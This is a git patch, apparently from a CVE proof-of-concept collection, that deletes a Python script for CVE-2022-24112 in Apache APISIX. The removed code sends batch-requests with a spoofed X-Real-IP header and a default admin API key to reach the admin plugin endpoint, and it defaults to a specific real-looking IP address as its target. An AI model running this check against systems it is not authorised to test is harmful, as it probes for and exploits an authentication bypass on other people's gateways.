From 817ef937e1bc052c5b4b489ffd4c6acb095ab75d Mon Sep 17 00:00:00 2001
From: yangjipeng
Date: Tue, 14 Mar 2023 09:38:25 +0800
Subject: [PATCH] Update Floder Status.
---
cve/apache-APISIX/CVE-2022-24112.py | 37 -----------------------------
1 file changed, 37 deletions(-)
delete mode 100644 cve/apache-APISIX/CVE-2022-24112.py
diff --git a/cve/apache-APISIX/CVE-2022-24112.py b/cve/apache-APISIX/CVE-2022-24112.py
deleted file mode 100644
index 47aecefb..00000000
--- a/cve/apache-APISIX/CVE-2022-24112.py
+++ /dev/null
@@ -1,37 +0,0 @@
-import requests
-from secrets import token_hex
-import argparse
-# Apache APISIX 存在改写 X-REAL-IP header 的风险公告(CVE-2022-24112),利用batch-requests插件 可以RCE
-
-# get poc from biu ~
-
-def poc(host, port=443):
- scheme = 'https' if '443' in str(port) else 'http'
- target = '{}://{}:{}'.format(scheme, host, port)
- token = token_hex(10)
- uris = ['/apisix/batch-requests', '/api-gw/batch']
- hits = [f'failed to load plugin {token}']
- data = {"headers": {'X-API-KEY': 'edd1c9f034335f136f87ad84b625c8f1', 'X-Real-IP': '127.0.0.1'},
- 'pipeline': [{'path': f'/apisix/admin/plugins/{token}'}]}
-
- try:
- targets = ['{}{}'.format(target, uri) for uri in uris]
- with requests.Session() as session:
- for target in targets:
- response = session.post(target, timeout=10, json=data, verify=False, proxies={'http': "http://127.0.0.1:8080"})
- for hit in hits:
- if hit in response.text:
- output = response.json()
-
- return True, host, target, output
- except Exception as error:
- return False
- return False
-'''
-'''
-parser = argparse.ArgumentParser(description='test')
-parser.add_argument('--ip', type=str, nargs='?', default='183.66.101.103', help='IP地址')
-parser.add_argument('--port', type=int, nargs='?', default=9080, help='端口')
-args = parser.parse_args()
-print (poc(host=args.ip, port=args.port))
-
-- Gitee